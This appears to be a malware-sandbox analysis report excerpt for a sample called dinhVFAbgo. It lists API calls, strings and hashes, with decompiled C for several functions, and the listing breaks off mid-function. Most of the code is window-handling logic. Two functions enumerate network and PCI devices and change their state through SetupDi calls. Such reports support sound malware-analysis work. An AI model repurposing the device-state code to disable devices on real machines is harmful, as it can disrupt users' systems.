0x00cce126
0x00cce12a
0x00cce131
0x00cce134
0x00cce143
0x00cce14a
0x00cce161
0x00cce169
0x00cce170
0x00cce17f
0x00cce197
0x00cce1b7
0x00cce1c3
0x00cce1ce
0x00cce1d6
0x00cce1e2
0x00cce1f2
0x00cce1f8
0x00cce1fd
0x00cce206
0x00cce220
0x00cce220
0x00cce237
0x00cce24b
0x00cce257
0x00cce26a
0x00cce27e
0x00cce27e
0x00cce281
0x00cce287
0x00cce28f
0x00cce297
0x00cce29b
0x00cce2b5

APIs

SetRectEmpty.USER32(?), ref: 00CCE0A8
LoadCursorW.USER32(?,00007904), ref: 00CCE0CE
LoadCursorW.USER32(?,00007905), ref: 00CCE101
SendMessageA.USER32(?,00001201,00000000,00000006), ref: 00CCE161
SendMessageA.USER32(?,00001201,00000001,00000006), ref: 00CCE197
SendMessageA.USER32(?,00000401,00000001,00000000), ref: 00CCE1F2
SendMessageA.USER32(?,00000418,00000000,?), ref: 00CCE220
GetParent.USER32(?), ref: 00CCE25C

Strings

d, xrefs: 00CCE170
Value, xrefs: 00CCE169
Property, xrefs: 00CCE134

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$CursorLoad$EmptyParentRect
String ID: Property$Value$d
API String ID: 2284761715-1409410049
Opcode ID: 22b803b243a467bac1876f1fd3a3a01dad288825494f6cc74d75299461116c2d
Instruction ID: 57954b0a0fb60cdce3bec90da08e321ee0c643cfaa54c3d0cba673784773b697
Opcode Fuzzy Hash: 22b803b243a467bac1876f1fd3a3a01dad288825494f6cc74d75299461116c2d
Instruction Fuzzy Hash: EE519F71A04215AFCB14AF61CD89FEEBBB5FF09710F0401AAF559A72A2CB705A04DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6DDA Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 113COMMON

Download Yara Rule

APIs

StringFromCLSID.OLE32(?,?), ref: 00CA6E26
SetupDiClassNameFromGuidA.SETUPAPI(?,?,00000080,00000000), ref: 00CA6E41
SetupDiGetDeviceInstanceIdA.SETUPAPI(00000000,0000001C,?,00000080,00000000), ref: 00CA6E7D
SetupDiSetClassInstallParamsA.SETUPAPI(00000000,0000001C,00000008,00000014), ref: 00CA6F1A
SetupDiChangeState.SETUPAPI(00000000,0000001C), ref: 00CA6F28
CoTaskMemFree.OLE32(?), ref: 00CA6F34
SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,0000001C), ref: 00CA6F44

Strings

%s, xrefs: 00CA6EB7, 00CA6EBD, 00CA6ECA
Net, xrefs: 00CA6E4D
PCI, xrefs: 00CA6E8B
%s, xrefs: 00CA6EA7

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Setup$ClassDeviceFrom$ChangeEnumFreeGuidInfoInstallInstanceNameParamsStateStringTask
String ID: %s$%s$Net$PCI
API String ID: 2457446037-246893848
Opcode ID: a974db2ada8d86d38e741168d79e102e84e2a0c6745401bbc183b42c59144d08
Instruction ID: c50a552c92e9b4013ba104f01252c18101c7ad2706b28564a0bdc04bccfe8126
Opcode Fuzzy Hash: a974db2ada8d86d38e741168d79e102e84e2a0c6745401bbc183b42c59144d08
Instruction Fuzzy Hash: F9417F7290021DAFEB619B60DD45BEAB7BDEB09704F0040E5F649E2090DB709F89CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6F61 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 111COMMON

Download Yara Rule

APIs

StringFromCLSID.OLE32(?,?), ref: 00CA6FAD
SetupDiClassNameFromGuidA.SETUPAPI(?,?,00000080,00000000), ref: 00CA6FC8
SetupDiGetDeviceInstanceIdA.SETUPAPI(00000000,0000001C,?,00000080,00000000), ref: 00CA7004
SetupDiSetClassInstallParamsA.SETUPAPI(00000000,0000001C,00000008,00000014), ref: 00CA70A6
SetupDiChangeState.SETUPAPI(00000000,0000001C), ref: 00CA70B4
CoTaskMemFree.OLE32(?), ref: 00CA70C0
SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,0000001C), ref: 00CA70D0

Strings

%s, xrefs: 00CA703E, 00CA7044, 00CA7051
Net, xrefs: 00CA6FD4
PCI, xrefs: 00CA7012
%s, xrefs: 00CA702E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Setup$ClassDeviceFrom$ChangeEnumFreeGuidInfoInstallInstanceNameParamsStateStringTask
String ID: %s$%s$Net$PCI
API String ID: 2457446037-246893848
Opcode ID: c32aec0a7aa91bd89fd3ae8d3f7175ae6819dca2a260d17e517c19b1acfa7752
Instruction ID: ff2ccdedebad7941167e12105318f2927c77fd6aeedf37cdfc7dff72327efa7f
Opcode Fuzzy Hash: c32aec0a7aa91bd89fd3ae8d3f7175ae6819dca2a260d17e517c19b1acfa7752
Instruction Fuzzy Hash: A2416E7290421DAFEB219B60DD45BEAB7BDFB05704F0040E5F645E2091EBB0AB88CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00CFB207 Relevance: 18.5, APIs: 12, Instructions: 469
windowCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00CFB207(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				int _v44;
				int _v48;
				int _v52;
				signed int _v56;
				int _v60;
				struct tagPOINT _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t148;
				RECT* _t153;
				intOrPtr* _t179;
				signed int _t186;
				signed int _t187;
				signed int _t195;
				signed int _t198;
				signed int _t207;
				int _t223;
				struct HWND__* _t241;
				signed int _t272;
				signed int _t276;
				void* _t292;
				int _t299;
				int _t385;
				void* _t388;
				int _t389;
				intOrPtr* _t390;
				int _t397;
				int _t403;
				intOrPtr* _t405;
				int _t409;
				intOrPtr* _t410;
				intOrPtr* _t415;
				signed int _t419;

				_t388 = __edx;
				_t148 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t148 ^ _t419;
				_t299 = __ecx;
				_t393 =  *( *__ecx + 0x2c0);
				 *0xe17a64(_a8);
				_t389 =  *( *( *__ecx + 0x2c0))();
				_v60 = _t389;
				if(_t389 < 0) {
					L49:
					_t153 = 0;
					__eflags = 0;
					L50:
					return E00DDCBCE(_t153, _t299, _v8 ^ _t419, _t388, _t389, _t393);
				}
				_t393 =  *( *__ecx + 0x1f0);
				 *0xe17a64(_t389);
				if( *( *( *__ecx + 0x1f0))() == 0) {
					goto L49;
				}
				_t393 =  *( *__ecx + 0x1b0);
				 *0xe17a64(_t389);
				_t389 = E00CACA6C(0xe1f7d4,  *( *( *__ecx + 0x1b0))());
				_v44 = _t389;
				if(_t389 == 0) {
					goto L49;
				}
				_t393 =  *( *_t389 + 0x1cc);
				 *0xe17a64();
				if( *( *( *_t389 + 0x1cc))() == 0) {
					goto L49;
				}
				_t389 = 0;
				_v40.left = 0;
				_v40.top = 0;
				_v40.right = 0;
				_v40.bottom = 0;
				SetRectEmpty( &_v40);
				_t393 =  *( *_v44 + 0x2c0);
				 *0xe17a64( &_v40, _a4);
				if( *( *( *_v44 + 0x2c0))() == 0) {
					goto L49;
				}
				if(_a4 != 1) {
					L8:
					_t393 =  *( *_v44 + 0x18c);
					 *0xe17a64();
					if( *( *( *_v44 + 0x18c))() == 0) {
						goto L49;
					}
					 *0xe17a64();
					_v56 =  *((intOrPtr*)( *((intOrPtr*)( *_v44 + 0x1b8))))();
					_t179 = E00CACA6C(0xe2a530, E00CB277F(_t299, _v44, _t388, GetParent( *(_t299 + 0x20))));
					_v48 = _t179;
					if(_t179 != 0) {
						 *0xe17a64(_t389);
						_v52 =  *((intOrPtr*)( *((intOrPtr*)( *_t179 + 0x228))))();
						 *0xe17a64();
						_t186 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x1cc))))();
						__eflags = _t186;
						if(_t186 != 0) {
							L13:
							_t397 = _v44;
							_t187 = E00CACB0B(_t397, 0xe6896c);
							__eflags = _t187;
							if(_t187 != 0) {
								 *0xe17a64(1);
								 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 0x1f0))))();
								_t397 = _v44;
							}
							__eflags = _a12 - _t389;
							if(_a12 == _t389) {
								__eflags = _v56 & 0x00000002;
								if((_v56 & 0x00000002) != 0) {
									__eflags = _a4 - 1;
									if(_a4 == 1) {
										_a12 = 1;
									}
								}
							}
							__eflags = _v60 -  *((intOrPtr*)(_t299 + 0xc0));
							if(_v60 !=  *((intOrPtr*)(_t299 + 0xc0))) {
								E00CB7B32(_t397, 5);
							}
							 *0xe17a64(_t397, _v60, _a4, _a12);
							 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x3b8))))();
							 *0xe17a64();
							_t195 =  *( *( *_t299 + 0x1ac))();
							__eflags = _t195;
							if(_t195 != 0) {
								 *0xe17a64();
								_t198 =  *( *( *_t299 + 0x1a4))();
								__eflags = _t198;
								if(_t198 != 0) {
									goto L30;
								}
								_t415 =  *((intOrPtr*)( *_v48 + 0x224));
								 *0xe17a64(_t389, _t389, _t389);
								goto L29;
							} else {
								_t272 = _v52;
								__eflags = _t272;
								if(_t272 == 0) {
									 *0xe17a64();
									_t276 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x3b0))))();
									__eflags = _t276;
									if(_t276 == 0) {
										E00CB7B32(_t299, _t389);
									} else {
										 *0xe17a64();
										 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x60))))();
									}
									goto L30;
								} else {
									_t415 =  *((intOrPtr*)( *_t272 + 0x17c));
									 *0xe17a64(_v48, 1, _t389);
									L29:
									 *_t415();
									L30:
									 *0xe17a64();
									 *((intOrPtr*)( *((intOrPtr*)( *_t299 + 0x184))))();
									goto L31;
								}
							}
						}
						_t393 =  *( *_t299 + 0x1a4);
						 *0xe17a64();
						_t292 =  *( *( *_t299 + 0x1a4))();
						__eflags = _t292 - 1;
						if(_t292 == 1) {
							goto L49;
						}
						goto L13;
					} else {
						_v52 = _t389;
						L31:
						 *0xe17a64(_t389);
						_t403 =  *((intOrPtr*)( *((intOrPtr*)( *_v44 + 0x228))))();
						_t207 = _v56 & 0x00000002;
						_v60 = _t403;
						_v68.y = _t207;
						if(_t207 != 0 && _a4 == 1 && _t403 != 0) {
							ReleaseCapture();
							E00CB7A0A(_t299, _t403, _t388);
							SendMessageA( *(E00CB277F(_t299, _t403, _t388, GetParent( *(_t299 + 0x20))) + 0x20), 0x363, _t389, _t389);
						}
						 *(_t299 + 0x158) = _t389;
						_t393 =  *( *_t299 + 0x1ac);
						 *0xe17a64();
						if( *( *( *_t299 + 0x1ac))() == 1) {
							_t434 =  *((intOrPtr*)(_t299 + 0x12c)) - _t389;
							if( *((intOrPtr*)(_t299 + 0x12c)) != _t389) {
								_v24.left = _t389;
								_v24.top = _t389;
								_v24.right = _t389;
								_v24.bottom = _t389;
								GetWindowRect( *(_v48 + 0x20),  &_v24);
								 *0xe17a64(_t389);
								_t223 = E00CACA6C(0xe6896c,  *((intOrPtr*)( *((intOrPtr*)( *_t299 + 0x1b0))))());
								_t405 = _v48;
								_v44 = _t223;
								E00CE0E1A(_t405, _t434, _t223, _t405, 1);
								_t390 = _v44;
								E00D8B4CD(_t405, _t390, _a4, _t389);
								 *0xe17a64();
								 *0xe17a64( *((intOrPtr*)( *((intOrPtr*)( *_t405 + 0x194))))());
								 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 0x1e0))))();
								 *0xe17a64(0, 1);
								 *((intOrPtr*)( *((intOrPtr*)( *_t299 + 0x198))))();
								_t299 = _v48;
								if(_v52 == 0) {
									 *0xe17a64();
									_v52 =  *((intOrPtr*)( *((intOrPtr*)( *_t299 + 0x19c))))();
								}
								 *0xe17a64(1);
								 *((intOrPtr*)( *((intOrPtr*)( *_v44 + 0x1f0))))();
								_t409 = _v52;
								_t359 = _t409;
								E00CBA172(_t409,  &_v24);
								_t241 = 0;
								if(_t409 != 0) {
									_t241 =  *(_t409 + 0x20);
								}
								_t410 = _v44;
								E00CB277F(_t299, _t359, _t388, SetParent( *(_t410 + 0x20), _t241));
								 *0xe17a64(0, _v24.left, _v24.top, _v24.right - _v24.left, _v24.bottom - _v24.top, 0x94, 0);
								 *((intOrPtr*)( *((intOrPtr*)( *_t410 + 0x238))))();
								 *0xe17a64(1, 0, 0);
								 *((intOrPtr*)( *((intOrPtr*)( *_v44 + 0x224))))();
								E00CB7B32(_t299, 0);
								_t393 = _v44;
								InvalidateRect( *(E00CB277F(_t299, _t299, _t388, GetParent( *(_t393 + 0x20))) + 0x20), 0, 1);
								UpdateWindow( *(E00CB277F(_t299, _t299, _t388, GetParent( *(_t393 + 0x20))) + 0x20));
								_t389 =  *(_t299 + 0x20);
							}
						}
						if(_a4 == 1) {
							_t299 = _v60;
							if(_t299 != 0) {
								if(_v68.y == 0) {
									__eflags = _v56 & 0x00000001;
									if((_v56 & 0x00000001) != 0) {
										E00CB7A0A(_t299, _t299, _t388);
									}
								} else {
									_t393 =  *( *_t299 + 0x210);
									 *0xe17a64(_t389);
									 *( *( *_t299 + 0x210))();
									E00D3934F(_t299);
								}
							}
						}
						_t153 = 1;
						goto L50;
					}
				}
				_v68.x = 0;
				_v68.y = 0;
				GetCursorPos( &_v68);
				_t393 =  *0xe88840; // 0x4
				_v56 =  *((intOrPtr*)(_t299 + 0x160)) - _v68.y;
				_t385 =  *0xe88844; // 0x4
				_v52 = _t385;
				if(E00DEC8A6(_t388,  *((intOrPtr*)(_t299 + 0x15c)) - _v68.x) >= _t393 || E00DEC8A6(_t388, _v56) >= _v52) {
					goto L8;
				} else {
					goto L49;
				}
			}

0x00cfb207
0x00cfb20d
0x00cfb214
0x00cfb218
0x00cfb221
0x00cfb229
0x00cfb233
0x00cfb235
0x00cfb23a
0x00cfb790
0x00cfb790
0x00cfb790
0x00cfb792
0x00cfb7a0
0x00cfb7a0
0x00cfb243
0x00cfb24b
0x00cfb257
0x00000000
0x00000000
0x00cfb260
0x00cfb268
0x00cfb27d
0x00cfb27f
0x00cfb286
0x00000000
0x00000000
0x00cfb28e
0x00cfb296
0x00cfb2a2
0x00000000
0x00000000
0x00cfb2a8
0x00cfb2ae
0x00cfb2b1
0x00cfb2b4
0x00cfb2b7
0x00cfb2ba
0x00cfb2c8
0x00cfb2d4
0x00cfb2e1
0x00000000
0x00000000
0x00cfb2eb
0x00cfb33e
0x00cfb343
0x00cfb34b
0x00cfb358
0x00000000
0x00000000
0x00cfb36b
0x00cfb379
0x00cfb38e
0x00cfb393
0x00cfb39a
0x00cfb3af
0x00cfb3ba
0x00cfb3ca
0x00cfb3d3
0x00cfb3d5
0x00cfb3d7
0x00cfb3f6
0x00cfb3f6
0x00cfb400
0x00cfb405
0x00cfb407
0x00cfb415
0x00cfb41e
0x00cfb420
0x00cfb420
0x00cfb423
0x00cfb426
0x00cfb428
0x00cfb42c
0x00cfb431
0x00cfb434
0x00cfb436
0x00cfb436
0x00cfb434
0x00cfb42c
0x00cfb43c
0x00cfb442
0x00cfb448
0x00cfb448
0x00cfb464
0x00cfb46d
0x00cfb479
0x00cfb481
0x00cfb483
0x00cfb485
0x00cfb4f0
0x00cfb4f8
0x00cfb4fa
0x00cfb4fc
0x00000000
0x00000000
0x00cfb506
0x00cfb50e
0x00000000
0x00cfb487
0x00cfb487
0x00cfb48a
0x00cfb48c
0x00cfb4b6
0x00cfb4bf
0x00cfb4c1
0x00cfb4c3
0x00cfb4df
0x00cfb4c5
0x00cfb4cf
0x00cfb4d8
0x00cfb4d8
0x00000000
0x00cfb48e
0x00cfb496
0x00cfb49e
0x00cfb517
0x00cfb517
0x00cfb519
0x00cfb523
0x00cfb52b
0x00000000
0x00cfb52b
0x00cfb48c
0x00cfb485
0x00cfb3db
0x00cfb3e3
0x00cfb3eb
0x00cfb3ed
0x00cfb3f0
0x00000000
0x00000000
0x00000000
0x00cfb39c
0x00cfb39c
0x00cfb52d
0x00cfb53b
0x00cfb546
0x00cfb54b
0x00cfb54e
0x00cfb551
0x00cfb554
0x00cfb560
0x00cfb568
0x00cfb586
0x00cfb586
0x00cfb58e
0x00cfb594
0x00cfb59c
0x00cfb5a9
0x00cfb5af
0x00cfb5b5
0x00cfb5be
0x00cfb5c5
0x00cfb5c8
0x00cfb5cb
0x00cfb5d1
0x00cfb5e2
0x00cfb5f2
0x00cfb5f7
0x00cfb602
0x00cfb605
0x00cfb60e
0x00cfb614
0x00cfb62b
0x00cfb639
0x00cfb642
0x00cfb653
0x00cfb65b
0x00cfb65d
0x00cfb663
0x00cfb66f
0x00cfb679
0x00cfb679
0x00cfb68b
0x00cfb694
0x00cfb696
0x00cfb69d
0x00cfb69f
0x00cfb6a4
0x00cfb6a8
0x00cfb6aa
0x00cfb6aa
0x00cfb6ad
0x00cfb6bb
0x00cfb6e5
0x00cfb6ee
0x00cfb701
0x00cfb70a
0x00cfb70f
0x00cfb714
0x00cfb72c
0x00cfb744
0x00cfb74a
0x00cfb74a
0x00cfb5b5
0x00cfb751
0x00cfb753
0x00cfb758
0x00cfb75e
0x00cfb77e
0x00cfb782
0x00cfb786
0x00cfb786
0x00cfb760
0x00cfb763
0x00cfb76b
0x00cfb773
0x00cfb777
0x00cfb777
0x00cfb75e
0x00cfb758
0x00cfb78d
0x00000000
0x00cfb78d
0x00cfb39a
0x00cfb2f0
0x00cfb2f4
0x00cfb2f7
0x00cfb30f
0x00cfb315
0x00cfb318
0x00cfb31f
0x00cfb32a
0x00000000
0x00000000
0x00000000
0x00000000

APIs

SetRectEmpty.USER32(?), ref: 00CFB2BA
GetCursorPos.USER32(?), ref: 00CFB2F7
GetParent.USER32(?), ref: 00CFB37C
ReleaseCapture.USER32 ref: 00CFB560
GetParent.USER32(?), ref: 00CFB570
SendMessageA.USER32(?,00000363,00000000,00000000), ref: 00CFB586
GetWindowRect.USER32 ref: 00CFB5D1
SetParent.USER32(?,00000000,?), ref: 00CFB6B4
GetParent.USER32(?), ref: 00CFB71A
InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 00CFB72C
GetParent.USER32(?), ref: 00CFB735
UpdateWindow.USER32(?), ref: 00CFB744

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Parent$Rect$Window$CaptureCursorEmptyInvalidateMessageReleaseSendUpdate
String ID:
API String ID: 2800639987-0
Opcode ID: b2f5f26a297d256f423a77f06d8b94bd126ed1c28dfff17ccbd6725f99d8c0f4
Instruction ID: 0a71cbb68aff62a29ea6c03d40948b8e6b21844ae0b4c6c78e5f17df40de3a31
Opcode Fuzzy Hash: b2f5f26a297d256f423a77f06d8b94bd126ed1c28dfff17ccbd6725f99d8c0f4
Instruction Fuzzy Hash: 4F022A35A042189FCB04DF65D9989EDBBB6EF89710F0540A9E916B7361CB30AE05CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE302E Relevance: 18.4, APIs: 12, Instructions: 442
windowCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00CE302E(long __ecx, intOrPtr __edx, char _a4, intOrPtr _a20, char _a24) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				struct tagPOINT _v64;
				long _v68;
				struct tagPOINT _v76;
				intOrPtr* _v80;
				struct tagPOINT _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t135;
				char _t161;
				void* _t170;
				signed int _t181;
				intOrPtr* _t220;
				long _t230;
				long _t234;
				void* _t237;
				intOrPtr* _t251;
				long _t279;
				intOrPtr _t336;
				intOrPtr _t364;
				intOrPtr _t365;
				intOrPtr* _t368;
				void* _t379;
				signed int _t397;

				_t364 = __edx;
				_t135 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t135 ^ _t397;
				_t279 = __ecx;
				_v68 = __ecx;
				 *0xe17a64();
				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x168))))() != 0) {
					L2:
					_t374 =  *((intOrPtr*)( *_t279 + 0x1cc));
					 *0xe17a64();
					if( *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x1cc))))() == 0) {
						L34:
						L35:
						return E00DDCBCE(1, _t279, _v8 ^ _t397, _t364, _t368, _t374);
					}
					_t368 = 0;
					_v40.left = 0;
					_v40.top = 0;
					_v40.right = 0;
					_v40.bottom = 0;
					GetWindowRect( *(_t279 + 0x20),  &_v40);
					 *0xe17a64();
					E00CBA172( *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x19c))))(),  &_v40);
					_v76.x = 0;
					_v76.y = 0;
					GetCursorPos( &_v76);
					_v64.x =  *(_t279 + 0x168);
					_v64.y =  *((intOrPtr*)(_t279 + 0x16c));
					ClientToScreen( *(_t279 + 0x20),  &_v64);
					_t374 =  *((intOrPtr*)( *_t279 + 0x2c0));
					 *0xe17a64( &_a4, _a20);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x2c0))))() == 0) {
						goto L34;
					}
					_t161 = 0x10;
					_v56 = _t161;
					_v52 = _t161;
					_v48 = _t161;
					_v44 = _t161;
					E00D52D7A(0xe6872c,  &_a4,  &_v56);
					_t374 =  &_a4;
					_t279 =  *( *_t279 + 0x214);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *0xe17a64();
					_t368 =  *_t279();
					_v80 = _t368;
					if(_t368 == 0) {
						goto L35;
					} else {
						_t279 = _v68;
						 *0xe17a64();
						_t170 = E00D537D5(0xe6872c, _t364,  *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x19c))))());
						if(_a20 != 1 && _t170 != 0 &&  *0xe88708 == 0) {
							 *0xe17a64();
							 *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x31c))))();
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t368 = _v80;
						 *0xe17a64(_t368, 0);
						 *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x21c))))();
						_t302 = _v76.y;
						_v88.x = _v76.x;
						_v88.y = _v76.y;
						ScreenToClient( *(_t279 + 0x20),  &_v88);
						if(_a20 == 1) {
							SendMessageA( *(_t279 + 0x20), 0x202, 0xffff, (_v88.y & 0x0000ffff) << 0x00000010 | _v88.x & 0x0000ffff);
							 *0xe17a64();
							_t302 = _t279;
							if( *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x16c))))() != 0) {
								 *0xe17a64(0);
								_t302 = _t279;
								_t364 =  *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x228))))();
								if(_t364 != 0) {
									_t302 = (_v88.y & 0x0000ffff) << 0x00000010 | _v88.x & 0x0000ffff;
									SendMessageA( *(_t364 + 0x20), 0x202, 0, (_v88.y & 0x0000ffff) << 0x00000010 | _v88.x & 0x0000ffff);
								}
							}
						}
						_v68 = E00CB277F(_t279, _t302, _t364, GetParent( *(_t279 + 0x20)));
						E00CB277F(_t279, _t302, _t364, SetParent( *(_t279 + 0x20),  *(_t368 + 0x20)));
						_t379 =  *_t279;
						_t181 =  *(_t279 + 0xb8);
						if(_t181 == 0) {
							 *0xe17a64(_v68);
							 *((intOrPtr*)(_t379 + 0x220))();
						} else {
							 *0xe17a64(_t181);
							 *((intOrPtr*)(_t379 + 0x220))();
							 *(_t279 + 0xb8) =  *(_t279 + 0xb8) & 0x00000000;
						}
						 *0xe17a64(_t279);
						 *((intOrPtr*)( *((intOrPtr*)( *_t368 + 0x178))))();
						 *0xe17a64();
						 *((intOrPtr*)( *((intOrPtr*)( *_t368 + 0x188))))();
						 *0xe17a64(0xe86aa8, 0, 0, 0, 0, 0x11, 0);
						 *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x238))))();
						if(_a20 == 1) {
							 *0xe17a64();
							if(( *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x1b8))))() & 0x00000001) != 0) {
								 *0xe17a64(0);
								 *((intOrPtr*)( *((intOrPtr*)( *_t368 + 0x210))))();
								 *((char*)(_t368 + 0x80)) = 1;
							}
						}
						 *0xe17a64();
						 *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x2c4))))();
						 *0xe17a64();
						 *0xe17a64( *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x1c0))))() | 0x00000001);
						 *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x1e4))))();
						_t374 =  *((intOrPtr*)( *_t279 + 0x210));
						 *0xe17a64();
						 *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x210))))();
						if(_a24 != 0) {
							 *0xe17a64(0);
							_t251 =  *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x228))))();
							_t374 =  *((intOrPtr*)( *_t251 + 0x1d0));
							 *0xe17a64();
							 *((intOrPtr*)( *((intOrPtr*)( *_t251 + 0x1d0))))();
							_t368 = _v80;
						}
						if(_a20 == 1) {
							_v24.left = 0;
							_v24.top = 0;
							_v24.right = 0;
							_v24.bottom = 0;
							GetWindowRect( *(_t368 + 0x20),  &_v24);
							_v64.x =  *(_t279 + 0x168);
							_v64.y =  *((intOrPtr*)(_t279 + 0x16c));
							ClientToScreen( *(_t368 + 0x20),  &_v64);
							_t230 = _v64.x;
							_t336 = _v24.right;
							if(_t230 > _t336 || _t230 < _v24.left) {
								asm("cdq");
								_t234 = (_t336 - _v24.left - _t364 >> 1) + _v24.left;
								_v64.x = _t234;
							}
							_t365 = _v64.y;
							if(_t365 > _v24.bottom || _t365 < _v24.top) {
								_t374 =  *((intOrPtr*)( *_t368 + 0x170));
								 *0xe17a64();
								_t237 =  *((intOrPtr*)( *((intOrPtr*)( *_t368 + 0x170))))();
								asm("cdq");
								_t234 = _v64.x;
								_t364 = (_t237 - _t365 >> 1) + _v24.top;
								_v64.y = _t364;
							}
							OffsetRect( &_v24, _v76.x - _t234, _v76.y - _t364);
							E00CB7A83(_t368, 0, _v24.left, _v24.top, _v24.right - _v24.left, _v24.bottom - _v24.top, 0x14);
							 *(_t368 + 0x130) = _v76.x;
							 *(_t368 + 0x134) = _v76.y;
						}
						if(_a24 != 0) {
							E00CB7B32(_t368, 8);
							 *0xe17a64();
							RedrawWindow( *( *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x19c))))() + 0x20),  &_v40, 0, 0x5b1);
							 *0xe17a64();
							if(E00CACB0B( *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x19c))))(), 0xe29e38) != 0) {
								 *0xe17a64();
								_t220 =  *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x19c))))();
								 *0xe17a64(0);
